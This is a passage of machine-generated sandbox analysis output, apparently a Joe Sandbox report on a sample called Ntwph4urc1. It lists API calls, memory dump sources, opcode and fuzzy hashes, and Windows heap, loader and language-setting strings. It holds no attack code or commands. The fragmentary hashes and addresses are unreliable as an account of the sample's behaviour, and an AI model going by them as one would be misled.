                                            • GlobalFree.KERNEL32(?), ref: 74351203
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                            • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc
                                            • String ID:
                                            • API String ID: 1780285237-0
                                            • Opcode ID: 9030e1a79c45d3034007a1404d1307dbf7a0978e4fec8fcaa38fea32bd12e091
                                            • Instruction ID: ed6ecec174de9451745bb0ee8527958c838c4e83500a3ea460e9916b2e5e1b46
                                            • Opcode Fuzzy Hash: 9030e1a79c45d3034007a1404d1307dbf7a0978e4fec8fcaa38fea32bd12e091
                                            • Instruction Fuzzy Hash: 3E31A1B2E10201DBEB009F76D945E76F7FCEB48211725055AF84ED7229EB34EB018BA0
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E59
                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E71
                                            • CharNextA.USER32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E82
                                            • lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E8B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                            • Instruction ID: a1795947179755a411c98c1569971d2b6f4e38ea7894d212e8297337e4f71977
                                            • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                            • Instruction Fuzzy Hash: E2F06231504514FFD7129BA5DD409AEBBA8EF06250B2540BAE884FB250D674DF029BE9

                                            Execution Graph

                                            Execution Coverage:0%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:100%
                                            Total number of Nodes:1
                                            Total number of Limit Nodes:0
                                            execution_graph 76597 36992df0 LdrInitializeThunk

                                            Control-flow Graph

                                            control_flow_graph 1 369935c0-369935cc LdrInitializeThunk
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0fae3e5718356fba40e59ca2b305b40299902773b0b8aef29414f5eb54a43413
                                            • Instruction ID: 534d9f4e7ff2298ceb7ad3d64e10430e35a3e33b0c437784fdd3d5578d35889d
                                            • Opcode Fuzzy Hash: 0fae3e5718356fba40e59ca2b305b40299902773b0b8aef29414f5eb54a43413
                                            • Instruction Fuzzy Hash: 15900271B0570402D10071988618706104A47D0211F65C452A143452CD87998A5565A2

                                            Control-flow Graph

                                            control_flow_graph 0 36992df0-36992dfc LdrInitializeThunk
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5c16c082b20ad9d2a8081a2367420b298390df8119e17488d38a903209964be1
                                            • Instruction ID: 7b14f45d2e21497e2ea76dead1aa132b279e2e1daf760be0256bebd43e836fe1
                                            • Opcode Fuzzy Hash: 5c16c082b20ad9d2a8081a2367420b298390df8119e17488d38a903209964be1
                                            • Instruction Fuzzy Hash: 8390027170160413D11171988608707004E47D0251F95C453A143451CD965A8A56A121

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                            • API String ID: 0-2897834094
                                            • Opcode ID: 666df6064273097d4ac9de032697107949f5519acc7122edb22043f04736e154
                                            • Instruction ID: c4891825ad3f0a7db58bb25aac7e3a9f213dd6fc18db4d50759eb22c0af988b1
                                            • Opcode Fuzzy Hash: 666df6064273097d4ac9de032697107949f5519acc7122edb22043f04736e154
                                            • Instruction Fuzzy Hash: F361C573815791EFE203FB99EC41D1173F4EB15B28B45405AEE01AF257CA3A9C82CE92

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $ $0
                                            • API String ID: 3446177414-3352262554
                                            • Opcode ID: 8f97792ff30477b77ebffb5997b82a0ff0dbee45ccf6cfe9e2e9f560797823be
                                            • Instruction ID: 1686bf654f9f1e760c0fadfe78b1285088f560abc8e92d52915501e5f1bf15fb
                                            • Opcode Fuzzy Hash: 8f97792ff30477b77ebffb5997b82a0ff0dbee45ccf6cfe9e2e9f560797823be
                                            • Instruction Fuzzy Hash: 683236B1A183418FE350CF69C884B4BBBE9BB88348F11492EF5998B350D776D949CB52

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                             control_flow_graph: rendered graph residue for the function whose entry block is 36a00274-36a00296 (first edge: call 369a7e54). The edge list references RtlDebugPrintTimes, GetPEB and the internal subroutines 369476b2, 36a00766, 3694b970, 3695ffb0, 36a00cb5, 3694758f, 369627f0, 36a011a4, 36983bc9, 36a0dac6, 3697fe99 and 369f86ba.
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                            • API String ID: 3446177414-1700792311
                                            • Opcode ID: 1f2ebd1484b22058f77c91e80e57c473ef832aa9eb61181023d07bbbabc97f91
                                            • Instruction ID: 02da9cca34a405782775193e88a3d80ba95efabde340d29d44686bc5723eb26a
                                            • Opcode Fuzzy Hash: 1f2ebd1484b22058f77c91e80e57c473ef832aa9eb61181023d07bbbabc97f91
                                            • Instruction Fuzzy Hash: ACD11179904784EFDB02DFA9D800AAEBBF2FF49314F448049E8459B252C736D982DF55
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                            • API String ID: 3446177414-1745908468
                                            • Opcode ID: dd616e198e48c9cc6abe0d6ea2d06f8f8f82ddda34cc80e0536768e196e314f4
                                            • Instruction ID: 2ae363a6d8345000e0422169ba12bdcbe16ce95689c86ab6b97c5553e79e7287
                                            • Opcode Fuzzy Hash: dd616e198e48c9cc6abe0d6ea2d06f8f8f82ddda34cc80e0536768e196e314f4
                                            • Instruction Fuzzy Hash: 34912276910744DFDB02CFA9C840AADBBF2FF49719F268059E445AF262CB369C42CB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                            • API String ID: 0-3591852110
                                            • Opcode ID: 29cff6ec3cd36a0c20525d062712e0e744a99105cb2fc8d81f1f55ba7b34c0b9
                                            • Instruction ID: 3b48f458ef52712b55e37d015d168c78a480bf50023783f9fe119331574f1da1
                                            • Opcode Fuzzy Hash: 29cff6ec3cd36a0c20525d062712e0e744a99105cb2fc8d81f1f55ba7b34c0b9
                                            • Instruction Fuzzy Hash: 7C12AD74A00741EFE716CFA5D880BA6BBF1EF09318F548459E8868B652D739EC81CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                            • API String ID: 0-3532704233
                                            • Opcode ID: a1f33e7a3e7c417e4aba4d752c2986c4cab757bcbaa6603299a010c1e249b173
                                            • Instruction ID: 335006105c3edfe98b37b3104700d100088627bfee649e3c01f5b964993bf090
                                            • Opcode Fuzzy Hash: a1f33e7a3e7c417e4aba4d752c2986c4cab757bcbaa6603299a010c1e249b173
                                            • Instruction Fuzzy Hash: 81B19EB99183559FE712DF24C840A5FB7E8AF88758F52492EF888D7240DB70DD08CB92
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                            • API String ID: 3446177414-3570731704
                                            • Opcode ID: 4792112699b528c8224d2ec7aec55dc83f9fdde9cf01acd50156ab3db8ffe221
                                            • Instruction ID: e6e48e7e66f3bd6e414d4444e22ad95f0deb2373765d8c2644fca3b685e36128
                                            • Opcode Fuzzy Hash: 4792112699b528c8224d2ec7aec55dc83f9fdde9cf01acd50156ab3db8ffe221
                                            • Instruction Fuzzy Hash: 58923875E10328CFEB24CF1ACC40B99BBB5AF45368F2581EAD989A7251D7309E81CF51
                                            APIs
                                            • RtlDebugPrintTimes.NTDLL ref: 3697D959
                                              • Part of subcall function 36954859: RtlDebugPrintTimes.NTDLL ref: 369548F7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                            • API String ID: 3446177414-1975516107
                                            • Opcode ID: a3f756a09a872be7325e416c6370e8ab35f052710283221e4b1c477561487055
                                            • Instruction ID: 887f361321a6d9333c10391b43a58728dd376a4c351265344413283d002d5c79
                                            • Opcode Fuzzy Hash: a3f756a09a872be7325e416c6370e8ab35f052710283221e4b1c477561487055
                                            • Instruction Fuzzy Hash: 3551CDB5E043459FEB11CFA9C8847CDBBB2BF44318F244159D5107B282DB75AC4ACB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                            • API String ID: 0-3063724069
                                            • Opcode ID: 5f955acf0e34a8d602b8dbf2f4c3613d7e70b2af15af8b32e40bd380c7f35001
                                            • Instruction ID: b05c950fbb3a191ced81bb3fd1419d6788318ac3476bacb3e27ba7f77cfd25e6
                                            • Opcode Fuzzy Hash: 5f955acf0e34a8d602b8dbf2f4c3613d7e70b2af15af8b32e40bd380c7f35001
                                            • Instruction Fuzzy Hash: E1D1B3B2805325AFD722CB558C40BABB7ECAF84B54F44092AF9949B251E774CD48CBD3
                                            Strings
                                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3694D146
                                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3694D262
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3694D2C3
                                            • @, xrefs: 3694D313
                                            • @, xrefs: 3694D2AF
                                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 3694D196
                                            • @, xrefs: 3694D0FD
                                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3694D0CF
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                            • API String ID: 0-1356375266
                                            • Opcode ID: e34ca8a0bc13b6804e46e57473c86383f964e935024d3038114673a889436aa1
                                            • Instruction ID: 9c34964510ac1e8e183dd840dc92388fe96c97f5f4217d62b29fda11c9f499b3
                                            • Opcode Fuzzy Hash: e34ca8a0bc13b6804e46e57473c86383f964e935024d3038114673a889436aa1
                                            • Instruction Fuzzy Hash: ABA16E759083459FE322DF25C840B9BB7E8BF88769F51492EF98896240D774D908CF93
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-523794902
                                            • Opcode ID: cfb01127d7242828411f8b4d77084210587c63e431ee1c2a37110d882eb7de53
                                            • Instruction ID: a7baf98197854b539fb4fb08a7a3b79a294c67b3305f6ca81fc22d6130e73f03
                                            • Opcode Fuzzy Hash: cfb01127d7242828411f8b4d77084210587c63e431ee1c2a37110d882eb7de53
                                            • Instruction Fuzzy Hash: 3842F275A043829FE312DF25C984B2ABBE5FF84348F24456DE885CB352DB34D846CB52
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                            • API String ID: 0-122214566
                                            • Opcode ID: a26c73f9c286642a93d04bed1cba53f3e02bc718d69809e2964b58b707ba7b9b
                                            • Instruction ID: 4f849d5338c1dd1ac836f1db97e3e8999b4825e7ee3687a143ea3d5d02dba852
                                            • Opcode Fuzzy Hash: a26c73f9c286642a93d04bed1cba53f3e02bc718d69809e2964b58b707ba7b9b
                                            • Instruction Fuzzy Hash: 16C13871F01319ABEB14CB66CC90B7E77B9AF45328F6040A9E901AB295EB74CC55C391
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-4253913091
                                            • Opcode ID: 53db85066fd5a05cdb66d624915bf75023cd1125734bf750061477951bd0a27a
                                            • Instruction ID: d70a12f7dcaad7a92a192a2af83346d6f74f1a5a361f4b6f640e27c4b74a6f6f
                                            • Opcode Fuzzy Hash: 53db85066fd5a05cdb66d624915bf75023cd1125734bf750061477951bd0a27a
                                            • Instruction Fuzzy Hash: A3F1ED74A00705DFEB15CF6ACA80B6AB7B6FF44358F2581A8E4059B391D730ED81CB91
                                            Strings
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 369C02E7
                                            • RTL: Re-Waiting, xrefs: 369C031E
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 369C02BD
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 78b72bab4f230f1155f64bf9f72a5ef5eefb5aace4eeb5fa235c9a374317d304
                                            • Instruction ID: fca298ed4432049a7d4d242ab5989349a7d8752fffcaf479818c96188ec953b0
                                            • Opcode Fuzzy Hash: 78b72bab4f230f1155f64bf9f72a5ef5eefb5aace4eeb5fa235c9a374317d304
                                            • Instruction Fuzzy Hash: F2E1E074A04741DFE721CF28C880B0AB7E4BF84368F200A2DF5A59B2E1DB75D945CB92
                                            Strings
                                            • Kernel-MUI-Language-SKU, xrefs: 3697542B
                                            • Kernel-MUI-Language-Allowed, xrefs: 3697527B
                                            • Kernel-MUI-Number-Allowed, xrefs: 36975247
                                            • WindowsExcludedProcs, xrefs: 3697522A
                                            • Kernel-MUI-Language-Disallowed, xrefs: 36975352
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                            • API String ID: 0-258546922
                                            • Opcode ID: a14454466ff891a53ad252cd9498b4751ce22efb0bfd393a516c2f754ddd63c6
                                            • Instruction ID: 41bcf2f696d30d3be7b4b31d681eac7c5cbb61199cf650012bafe73cb1059c22
                                            • Opcode Fuzzy Hash: a14454466ff891a53ad252cd9498b4751ce22efb0bfd393a516c2f754ddd63c6
                                            • Instruction Fuzzy Hash: BCF12976D10229EFDF11CF99C980ADEBBFDAF48650F61406AE501A7251EA749E01CBA0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: dbc6fb9ded5d6d211fa0a69a286d71edc0a861a48e387c1e06b85c6af1f8dfdf
